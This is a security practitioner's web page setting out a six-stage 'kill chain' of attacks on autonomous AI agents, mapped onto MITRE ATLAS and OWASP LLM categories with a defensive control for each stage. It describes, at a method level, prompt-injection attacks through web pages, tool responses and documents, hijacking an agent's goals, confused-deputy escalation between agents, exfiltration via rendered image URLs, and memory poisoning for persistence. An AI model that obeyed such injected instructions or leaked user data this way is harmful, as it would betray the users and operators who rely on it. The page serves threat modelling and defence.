A 6-stage attack lifecycle framework for autonomous AI agent systems. Building on MITRE ATLAS (16 tactics, 84 techniques) and OWASP LLM Top 10 v2.0 — extending them for agents that chain decisions, use tools, delegate, and persist.
Dhanasekaran, M. (2026). The Agentic AI Kill Chain. magesh.ai/kill-chain Existing frameworks don't account for the emergent security properties that arise when autonomy, long-term memory access, and dynamic tool usage are combined.
Same structural concept as the Cyber Kill Chain (sequential attack lifecycle), adapted for autonomous AI agents instead of network intrusion. 7 stages become 6 — weaponization is implicit in agent attacks.
MITRE ATLAS (16 tactics, 84 techniques) covers AI model attacks. OWASP LLM Top 10 covers application risks. This framework extends both into the agent-specific lifecycle — tool chains, delegation, memory persistence.
Every stage maps to a defensive control. Not an academic taxonomy — operational guidance built from hands-on experience building and securing agentic systems with Claude Code, Kiro, and MCP.
No vendor-specific recommendations. The framework applies to any agent architecture — whether you're building with Claude, GPT, Gemini, or open-source models. Patterns over products.
Every connection is an attack surface. Click a stage below to see where it strikes.
Maps the agent's tool access, permission boundaries, connected MCP servers, model type, system prompt constraints, and behavioral limits. Agent recon maps capability topology — not network topology.
Researchers demonstrated system prompt extraction from ChatGPT, Claude, and Gemini through iterative probing — asking models to repeat their instructions verbatim, or using multi-turn conversations to gradually extract constraint boundaries.
ATLAS AML.TA0001 (Reconnaissance) covers ML model recon. This stage extends it with agent-specific vectors: tool enumeration, permission boundary probing, and MCP server discovery.
Minimize information disclosure about agent capabilities. Don't reveal tool lists, permission structures, or system prompt details in responses.
Delivers adversarial input to alter agent behavior — through direct prompts, retrieved documents, tool responses, or data sources the agent consumes. The goal: change what the agent does, not just what it says.
Indirect prompt injection via web pages: a researcher embedded hidden instructions in a webpage that, when retrieved by a Bing Chat agent, caused it to exfiltrate the user's conversation history through a crafted URL. The agent followed the injected instruction because it couldn't distinguish retrieved content from user intent.
ATLAS AML.T0051 (Prompt Injection), AML.T0099 (Tool Data Poisoning) cover prompt and data poisoning. This stage extends them with tool schema injection, MCP protocol-level vectors, and context displacement attacks.
OWASP LLM01 (Prompt Injection) covers direct and indirect injection. This stage extends it with tool-response and protocol-level injection vectors specific to agent architectures.
Validate and sanitize all external inputs. Treat tool responses as untrusted. Pin system instructions outside the context window where possible.
Takes control of the agent's decision-making — redirecting goals, overriding instructions, or manipulating the reasoning chain. The agent continues operating autonomously — toward the attacker's objectives.
Anthropic's own red-team research showed that Claude agents given tool access could be manipulated into executing multi-step attack sequences — reading files, modifying configs, and calling APIs — all from a single injected instruction that overrode the system prompt's constraints. The agent reasoned its way through each step autonomously.
This is where the Kill Chain adds the most. ATLAS and OWASP focus on model-level and application-level threats. This stage extends both into autonomous decision chain hijacking and goal substitution at the planning layer — building on OWASP LLM06 (Excessive Agency) with active hijacking of running agents.
Immutable system instructions. Reasoning chain monitoring. Behavioral anomaly detection against established baselines.
Uses the hijacked agent to gain broader access — abusing tool permissions, chaining through multi-agent delegation, or bypassing human-in-the-loop controls. Agents trust other agents — exploit the trust model.
Researchers at UIUC demonstrated "confused deputy" attacks in multi-agent systems where a low-privilege agent crafted requests to a higher-privilege agent, inheriting its tool access. The orchestrator passed the request because inter-agent messages weren't treated as untrusted input — a trust boundary that doesn't exist in traditional systems.
ATLAS AML.TA0012 (Privilege Escalation) covers single-system escalation. This stage extends it into multi-agent delegation chains, confused deputy patterns in agent systems, and orchestrator compromise.
Least privilege for every tool and agent. No autoApprove for sensitive operations. Inter-agent authentication. Explicit delegation scoping.
Uses the agent's legitimate access to extract sensitive data. The agent is the exfiltration channel — it has legitimate access and legitimate output channels. Exfiltration looks like normal agent behavior.
The Bing Chat markdown rendering attack: an injected instruction caused the agent to encode conversation data into an image URL. When the browser rendered the markdown, it sent an HTTP request to the attacker's server with the user's data as URL parameters — exfiltration through a legitimate rendering feature.
ATLAS AML.T0055 (Exfiltration via Tool Invocation) covers tool-based exfiltration. This stage extends it with cross-session memory leakage and behavioral side-channel patterns specific to persistent agents.
Monitor and log all tool invocations. Data loss prevention on agent outputs. Session-scoped memory with no cross-session persistence of sensitive data.
Establishes long-term presence by poisoning agent memory, injecting into configuration files, or creating callbacks. The agent itself becomes the persistence mechanism.
SpaiwareAI research demonstrated persistent memory injection in ChatGPT — an attacker embedded instructions into a document that, when processed by the agent, wrote malicious directives into the long-term memory. Every future conversation then followed the injected instructions, across sessions, without the user's knowledge.
ATLAS AML.T0056 (Memory Manipulation) covers memory poisoning. This stage extends it into ecosystem persistence: instruction files, skill backdoors, MCP config manipulation, and agent startup poisoning.
Memory integrity verification. Config file integrity monitoring. Skill/plugin signing and verification. Regular memory audit and pruning.
Step through a realistic attack scenario against an AI coding agent. Each step maps to a kill chain stage.
Mapping all 16 ATLAS tactics against the Agentic AI Kill Chain. Shaded rows show where the Kill Chain extends ATLAS coverage into agent-specific vectors.
| ATLAS Tactic | ID | Kill Chain Stage | Agent Extension |
|---|---|---|---|
| Reconnaissance | AML.TA0001 | 01 RECON | + Tool enumeration, permission probing, MCP discovery |
| Resource Development | AML.TA0002 | 02 INJECT | + Crafted tool schemas, poisoned MCP servers |
| Initial Access | AML.TA0003 | 02 INJECT | + Indirect injection via retrieved context, tool responses |
| ML Model Access | AML.TA0004 | 01 RECON | + Agent capability mapping beyond model access |
| Execution | AML.TA0005 | 03 HIJACK | + Autonomous execution via reasoning chain hijack |
| Persistence | AML.TA0006 | 06 PERSIST | + Memory poisoning, config injection, skill backdoors |
| Defense Evasion | AML.TA0007 | 03 HIJACK | + Reasoning chain manipulation to bypass safety checks |
| Discovery | AML.TA0008 | 01 RECON | + MCP server discovery, tool registry enumeration |
| Collection | AML.TA0009 | 05 EXFIL | + Agent reads data through legitimate tool access |
| ML Attack Staging | AML.TA0010 | 02 INJECT | + Context window displacement, schema poisoning |
| Credential Access | AML.TA0011 | 04 ESCALATE | + Tool credential harvesting (AML.T0098) |
| Privilege Escalation | AML.TA0012 | 04 ESCALATE | + Multi-agent delegation chains, confused deputy, orchestrator compromise |
| Lateral Movement | AML.TA0013 | 04 ESCALATE | + Inter-agent trust exploitation, sub-agent delegation |
| Exfiltration | AML.TA0014 | 05 EXFIL | + Cross-session memory leakage, behavioral side channels |
| Impact | AML.TA0015 | 03–06 | Impact spans multiple stages in agentic context |
| Command and Control | AML.TA0016 | 06 PERSIST | + Agent callbacks via APIs, webhook persistence |
Every OWASP LLM vulnerability amplifies in agentic context. This matrix assesses agent-specific severity for each category — because an agent that acts on a vulnerability is fundamentally different from a chatbot that outputs one.
| OWASP Category | Chatbot Risk | Agent Risk | Why It Amplifies |
|---|---|---|---|
| LLM01 — Prompt Injection | HIGH | CRITICAL | Agents act on injected instructions — tool calls, file writes, API requests |
| LLM02 — Sensitive Info Disclosure | MEDIUM | HIGH | Agents have broader system access — files, databases, credentials |
| LLM03 — Supply Chain | MEDIUM | HIGH | Each MCP server, tool, and plugin is a supply chain link |
| LLM04 — Data/Model Poisoning | MEDIUM | HIGH | Poisoned data affects autonomous decisions with real consequences |
| LLM05 — Improper Output Handling | HIGH | CRITICAL | Agent outputs become real actions — shell commands, code execution |
| LLM06 — Excessive Agency | MEDIUM | CRITICAL | The core agent risk — too many tools, too few guardrails, autoApprove enabled |
| LLM07 — System Prompt Leakage | LOW | MED-HIGH | Reveals agent capabilities, tool lists, permission structures |
| LLM08 — Vector/Embedding Weaknesses | MEDIUM | HIGH | Persistent memory poisoning across sessions |
| LLM09 — Misinformation | MEDIUM | HIGH | Hallucinations trigger real actions — wrong API calls, wrong file edits |
| LLM10 — Unbounded Consumption | MEDIUM | HIGH | Agent loops amplify cost attacks — recursive tool calls, infinite delegation |
MITRE ATLAS maps 16 tactics for attacking AI models. OWASP lists 10 ways LLM applications fail. The Agentic AI Kill Chain extends both into the full attack lifecycle against autonomous agent systems — agents that chain decisions, use tools, delegate, and persist.
Magesh Dhanasekaran — Senior Security Consultant, 17 years in cybersecurity. Built from hands-on experience securing and building agentic AI systems with Claude Code, Kiro, and MCP.
This framework is open for reference, citation, and use in security assessments. Please cite as:
Dhanasekaran, M. (2026). The Agentic AI Kill Chain. magesh.ai/kill-chain Views are my own. This is a practitioner framework — it prioritizes operational utility over completeness. Cloud-agnostic. No vendor-specific recommendations.